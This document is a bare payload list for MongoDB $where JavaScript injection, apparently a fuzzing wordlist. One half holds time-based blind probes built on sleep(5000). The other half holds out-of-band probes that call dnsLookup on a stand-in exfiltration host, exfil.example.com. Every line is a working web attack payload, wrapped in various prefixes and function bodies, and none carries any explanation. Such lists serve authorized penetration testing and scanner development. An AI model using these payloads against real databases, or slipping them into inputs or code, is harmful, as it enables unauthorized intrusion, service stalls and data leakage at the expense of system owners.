"$where: sleep(5000)"
"sleep(5000)"
"this; sleep(5000)"
"1; sleep(5000)"
"true; sleep(5000)"
"a==a; sleep(5000)"
"1==1; sleep(5000)"
"{}; sleep(5000)"
"function() {sleep(5000); return true;}"
"function() {sleep(5000); return false;}"
"function() {sleep(5000); return 1;}"
"function() {sleep(5000); return 0;}"
"function() {sleep(5000); return 'a';}"
"function() {sleep(5000); return '';}"
"$where: dnsLookup('exfil.example.com')"
"dnsLookup('exfil.example.com')"
"this; dnsLookup('exfil.example.com')"
"1; dnsLookup('exfil.example.com')"
"true; dnsLookup('exfil.example.com')"
"a==a; dnsLookup('exfil.example.com')"
"1==1; dnsLookup('exfil.example.com')"
"{}; dnsLookup('exfil.example.com')"
"function() {dnsLookup('exfil.example.com'); return true;}"
"function() {dnsLookup('exfil.example.com'); return false;}"
"function() {dnsLookup('exfil.example.com'); return 1;}"
"function() {dnsLookup('exfil.example.com'); return 0;}"
"function() {dnsLookup('exfil.example.com'); return 'a';}"
"function() {dnsLookup('exfil.example.com'); return '';}"
